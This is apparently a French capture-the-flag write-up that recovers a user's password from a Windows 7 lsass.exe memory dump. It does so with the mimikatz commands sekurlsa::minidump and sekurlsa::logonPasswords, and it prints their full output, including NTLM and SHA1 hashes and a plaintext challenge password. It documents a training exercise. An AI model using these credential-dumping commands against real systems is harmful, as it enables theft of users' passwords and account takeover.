Lsass
Contexte
Un dump mémoire du processus lsass.exe extrait d'une machine Windows 7 vous est fourni. Saurez-vous retrouver le mot de passe de l'utilisateur apssis ?
Découverte du fichier
lsass.exe est un exécutable qui est nécessaire pour le bon fonctionnement de Windows. Il assure l'identification des utilisateurs.
Le dump mémoire du processus lsass peut contenir les identifiants de connexions des utilisateurs.
La technique de dump est décrite dans cet article :
Récupération des identifiants
On lance mimikatz et on charge le dump mémoire :
V:\APSSI\lsass>mimikatz.exe
.#####. mimikatz 2.2.0 (x64) #18362 Feb 29 2020 11:13:36
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP : 'lsass.dmp'On extrait les mots de passe du dump...
Mot de passe du compte Apssis : #TOUSCYBERVIGILANTS
mimikatz # sekurlsa::logonPasswords
Opening : 'lsass.dmp' file for minidump...
Authentication Id : 0 ; 140399 (00000000:0002246f)
Session : Interactive from 1
User Name : Apssis
Domain : machine_w7
Logon Server : MACHINE_W7
Logon Time : 01/08/2021 00:47:10
SID : S-1-5-21-2443922912-371119193-1189915212-1001
msv :
[00000003] Primary
* Username : Apssis
* Domain : machine_w7
* NTLM : ffd8a47bcf0d86c2bb879564e101c181
* SHA1 : 7ea760d71dc1281f55b0a5107d70fd4dbd4b8ae4
[00010000] CredentialKeys
* NTLM : 0268a7022263f5bc52136c2d7c8da085
* SHA1 : e5b296569165f4d6111dedc0c660f79df16242f0
tspkg :
wdigest :
* Username : Apssis
* Domain : machine_w7
* Password : #TOUSCYBERVIGILANTS
kerberos :
* Username : Apssis
* Domain : machine_w7
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 140351 (00000000:0002243f)
Session : Interactive from 1
User Name : Apssis
Domain : machine_w7
Logon Server : MACHINE_W7
Logon Time : 01/08/2021 00:47:10
SID : S-1-5-21-2443922912-371119193-1189915212-1001
msv :
[00010000] CredentialKeys
* NTLM : 0268a7022263f5bc52136c2d7c8da085
* SHA1 : e5b296569165f4d6111dedc0c660f79df16242f0
[00000003] Primary
* Username : Apssis
* Domain : machine_w7
* NTLM : ffd8a47bcf0d86c2bb879564e101c181
* SHA1 : 7ea760d71dc1281f55b0a5107d70fd4dbd4b8ae4
tspkg :
wdigest :
* Username : Apssis
* Domain : machine_w7
* Password : #TOUSCYBERVIGILANTS
kerberos :
* Username : Apssis
* Domain : machine_w7
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : SERVICE LOCAL
Domain : AUTORITE NT
Logon Server : (null)
Logon Time : 01/08/2021 00:46:14
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : MACHINE_W7$
Domain : WORKGROUP
Logon Server : (null)
Logon Time : 01/08/2021 00:46:14
SID : S-1-5-20
msv :
tspkg :
wdigest :
* Username : MACHINE_W7$
* Domain : WORKGROUP
* Password : (null)
kerberos :
* Username : machine_w7$
* Domain : WORKGROUP
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 30548 (00000000:00007754)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 01/08/2021 00:46:13
SID :
msv :
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : MACHINE_W7$
Domain : WORKGROUP
Logon Server : (null)
Logon Time : 01/08/2021 00:46:13
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : MACHINE_W7$
* Domain : WORKGROUP
* Password : (null)
kerberos :
* Username : machine_w7$
* Domain : WORKGROUP
* Password : (null)
ssp :
credman :Dernière mise à jour
